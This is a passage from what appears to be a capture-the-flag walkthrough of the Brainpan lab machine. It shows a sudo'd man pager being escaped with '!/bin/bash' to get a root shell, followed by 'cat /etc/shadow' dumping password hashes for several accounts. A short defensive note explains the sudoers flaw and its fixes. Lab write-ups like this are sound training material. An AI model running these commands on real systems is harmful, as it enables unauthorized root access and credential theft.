       [--regex|--wildcard]   [--names-only]  [-a]  [-u]  [--no-subpages]  [-P
       pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
       cation]  [-p  string]  [-t]  [-T[device]]  [-H[browser]] [-X[dpi]] [-Z]
       [[section] page ...] ...
       man -k [apropos options] regexp ...
       man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
       man -f [whatis options] page ...
       man -l [-C file] [-d] [-D] [--warnings[=warnings]]  [-R  encoding]  [-L
       locale]  [-P  pager]  [-r  prompt]  [-7] [-E encoding] [-p string] [-t]
       [-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
       man -w|-W [-C file] [-d] [-D] page ...
       man -c [-C file] [-d] [-D] page ...
       man [-hV]


DESCRIPTION
 Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
       man is the system's manual pager. Each page argument given  to  man  is
 Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash


# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN THE MAN PAGE (THE PAGER WAS STARTED BY THE sudo'd anansi_util, SO THE SHELL IT SPAWNS RUNS AS "ROOT")
# Defensive note: any NOPASSWD sudo rule whose target can launch an interactive program with shell escapes (man/less, more, vi) hands out root this way; the sudoers NOEXEC tag, or having the wrapper run the pager with LESSSECURE=1, blocks the escape.
!/bin/bash

root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#

# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow
root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::
daemon:*:15768:0:99999:7:::
bin:*:15768:0:99999:7:::
sys:*:15768:0:99999:7:::
sync:*:15768:0:99999:7:::
games:*:15768:0:99999:7:::
man:*:15768:0:99999:7:::
lp:*:15768:0:99999:7:::
mail:*:15768:0:99999:7:::
news:*:15768:0:99999:7:::
uucp:*:15768:0:99999:7:::
proxy:*:15768:0:99999:7:::
www-data:*:15768:0:99999:7:::
backup:*:15768:0:99999:7:::
list:*:15768:0:99999:7:::
irc:*:15768:0:99999:7:::
gnats:*:15768:0:99999:7:::
nobody:*:15768:0:99999:7:::
libuuid:!:15768:0:99999:7:::
syslog:*:15768:0:99999:7:::
messagebus:*:15768:0:99999:7:::
reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::
anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::
puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::